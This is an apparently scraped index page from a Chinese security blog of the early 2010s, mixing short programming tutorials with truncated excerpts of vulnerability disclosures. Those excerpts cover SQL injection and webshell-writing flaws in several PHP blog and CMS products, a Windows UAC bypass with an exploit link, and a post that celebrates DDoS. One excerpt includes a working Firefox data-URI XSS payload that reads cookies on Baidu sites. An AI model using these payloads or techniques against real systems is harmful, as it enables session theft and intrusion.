前两天 t00ls.net 有人发了个帖子，要求解密海洋顶端 2006+ 的一个密码，以下是解密详细过程。     海洋顶端是很出名的 ASP 木马，2006 年海洋顶端出了最新版本也是最

    vbScript 中 WScript.Shell 对象的 run 和 exec 函数功能使用详解 函数声明：     Set Ws = CreateObject("Wscript.Shell")     Function Exec(ByVal Command As String) As WshExec     Function Run(ByVal Command As String, [ByVal WindowStyle], [ByVal WaitOnReturn]) As Integer 函数区别：       1，返回值不同     Run 的返回值是一

    SetWindowPos 改变窗口位置、样式、尺寸函数功能详解 函数原型：     Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long     BOOL SetWindowPos(HWND hWnd，

    这一年变化比较大，换了好几个工作，最终还是回到了安全的岗位，合乎自己的职业规划！     平时空闲时间经常找些站练练手，基本是新闻闹出轰动的站与一

    VB SendMessage 发送消息函数完全使用手册，SendMessage 函数功能详解。     首先我们了解一下Windows的消息机制。Windows是一个消息驱动

    新闻：     http://video.sina.com.cn/v/b/46939706-1047453724.html     http://news.cntv.cn/china/20110221/109081.shtml     本站从今日起不再发布任何“黑客”工具，以前发布的所有跟“黑客”工具沾边的东西全部删除了，以后也不会再发布了。     鉴于国内的形

    T00ls.Net安全技术论坛将在2010年2月22日起，永久关闭工具、免杀、溢出、程序版块！技术版块只保留技术讨论、脚本漏洞、linux

    近期花花草草的太多了。t00ls和许多论坛的名字在cctv一闪而过。许多论坛默默的开始关闭了。     土司内部讨论暂时关闭论坛，进行和谐转型。    

    Bo-Blog BloggerBo-blog 博客程序注入后 COOKIE 欺骗漏洞     看了 xhming 同学的文章有感而发，立马重新下载 boblog 看一篇，那个注入漏洞形成 xhming 同学已经说明了，此前我找到一个注入漏洞，也

    Bo-Blog BloggerBo-blog 博客程序鸡肋注入漏洞     by:xhm1n9 2011.2.21 inc/mod_main.php //漏洞文件：  case 'category':    if (!$job) $job='default';  else $job=basename($job);  $ifannouncement="none";  acceptrequest('mode');  if ($mode==1 || $mode==2) {       //..........................  } elseif (!empty($mode) && (!is_numeric($mode) || $mode>2)) {      getHttp404($lnc[313]);  }    //...................... if (is_numeric($itemid)) $itemid=floor($itemid); //注意1         elseif (isset($categorynames[$itemid])) $item

    BEES 企业网站管理系统 v1.6 后台写 Shell 漏洞     By：风之传说     晚上无聊，然后呢到网上搜了下，无意中搜到此系统，于是就有了以下文章，方便大家以后拿SHE

Abs 取、返回指定数字绝对值函数功能详解 功能描述：     返回数字的绝对值。 函数语法：     Abs(number) 参数详解：     number 参数可以是任意有效的数值表达式。     如果 number 包含 N

    DYHB-blog V1.4 PHP CMS 博客系统直接写马漏洞。     刚下载来看一开始就看到，运气真好。     public.php 文件，游客发布文章……     经典对白看代码。 public.php： if($view=="save"){         /

    昨晚看了风之同学的帖子（Simple-Log 1.2PHP博客系统延迟注射漏洞），有感而发。     今天略看了一下，发现一些小漏洞。希望土司同学们

    其实这个漏洞，一年前一个朋友就告诉我了，一直也没怎么玩这个。     我也没怎么太多去试，具体利用好象有点点麻烦，看到别人都已经放出来了，我也丢出

    发布作者：风之传说     发布日期：2011-2-18 6:00:00     官方地址：www.simple-log.com     影响版本：v1.2     漏洞名称：Simp

    void 无类型函数功能详解     中文翻译为“无类型”。常用在程序编写中对定义函数的参数类型、返回值、函数中指针类型进行声明。     void 表示函数返回值类型是

    return 返回函数值功能详解     return 表示从被调函数返回到主调函数继续执行，返回时可附带一个返回值，由return后面的参数指定。     return 通常是必要的，因为

制造大规模网络恐慌，引爆网络核战争…… I Love It! \(^o^)/ 我们知道，通过分布式拒绝服务(DDoS)攻击可以黑掉一个网站，通过某些手段可以封锁整个国家的互

    Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day，Bypassing UAC with User Privilege under Windows Vista/7 - Mirror。     补丁出来了价值就不大了。 Exp下载地址：     http://www.exploit-db.com/sploits/uacpoc.zip 漏洞分析：     http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/     http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4398

    by:xhm1n9     关注了下最近几位大牛网站被黑的消息，知道了是用bo-blog就下了套2.1.1看看，发现了点问题。此程序和F2blog存在一样的上传b

    今天看了一下，有些友情链接失效了，所以摘除了。在以下列表里有摘除的链接，以及具体原因。本站会不定期检查友情链接，同时也欢迎新朋友前来做友情

核总提示：这是2007年05月31日的新闻了……，其实此技术在2004年有提出，不过貌似一直无人研究…… 利用,P2P,网络,发动,大规模,大

    看到有位同鞋发了个DiY-Page sqlInj漏洞分析的帖子，我也跟着读了读代码，发现Diy-Page v8.2程序还存在多处漏洞，包括本地

    /**     * Title:Firefox data uri xss     * Author:sogili@0xsec     * Website:0xsec.org sogili.com     * Date:2011/02/13     */ Exp： <html> <!-- by sogili --> <body> <a href="data:text/html;base64,PHNjcmlwdD5vcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9J3h4b28nO2Nsb3NlKCk8L3NjcmlwdD4=" target="_blank">Fiefox click</a> <!--<a href="data:text/html,<script>opener.document.body.innerHTML='0xsec.org';close()</script>" target="_blank">Fiefox click</a>--> </body> <html> Demo： 百度空间XSS： <a target="_blank" href="data:text/html;base64,PHNjcmlwdD5jbG9zZSgpO3dpdGgob3BlbmVyKWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">Firefox user click</a> 百度贴吧XSS： <a target="_blank" href="data:text/html;base64,PHNjcmlwdD5jbG9zZSgpO3dpdGgob3BlbmVyKWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">Firefox user

    C/C++ 中的 include 命令，VC，C，C++ 中的 include 预处理、包含文件命令功能详解。 引言：     做c/c++编程的对#include指令都不会陌生，绝大多数也都

    漏洞标题：Pcook CMS 文章管理系统 v2.2 以及以下版本的注入漏洞     影响程序：Pcook CMS 文章管理系统 v2.2 以及以下版本     下载地址：http://do

.APS：存放二进制资源的中间文件，VC把当前资源文件转换成二进制格式，并存放在APS文件中，以加快资源装载速度。资源辅助文件。 .BMP：位

VC，C，C++，控制台输出，立即输出，刷新缓冲区；C++ 立即输出、刷新缓冲区： std::cout<<std::endl; endl = \n + 刷新缓冲区 该函数在函数库 iostream 中。

VC，C，C++，控制台输入输出函数功能详解，使用示例，C++ 控制台输入输出函数使用示例： #include <iostream> int main() {  std::cout<<"hello,world!\n";  int x;  std::cin>>x;  std::cout<<x;  std::cout<<"\n";  return 0; }